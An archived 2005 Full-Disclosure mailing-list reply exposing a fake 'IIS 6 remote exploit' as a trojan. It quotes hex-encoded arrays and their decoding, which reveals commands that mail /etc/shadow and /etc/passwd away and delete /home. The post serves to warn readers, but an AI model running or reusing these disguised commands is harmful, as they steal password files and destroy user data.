lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050420010124.11299.qmail@web50107.mail.yahoo.com>
Date: Wed Apr 20 02:01:29 2005
From: matrixhax0r at yahoo.com (David Li)
Subject: IIS 6 Remote Buffer Overflow Exploit

<sarcasm>Wait, you mean if I run that, I can hack
IIS?</sarcasm>
^_^

> Not that anyone would fall for running this on
> anything besides a test
> system, but to save 30 second to decode, what it
> really does (locally,
> not remotely) is: 
> 
> cat /etc/shadow |mail
> full-disclosure@...ts.grok.org.uk
> cat /etc/passwd |mail
> full-disclosure@...ts.grok.org.uk
> /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
> 
> -----Original Message-----
> 
> */
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";
> 
> char launcher [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> 
> char netcat_shell [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
> http://secunia.com/
> 


		
__________________________________ 
Do you Yahoo!? 
Plan great trips with Yahoo! Travel: Now over 17,000 guides!
http://travel.yahoo.com/p-travelguide

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ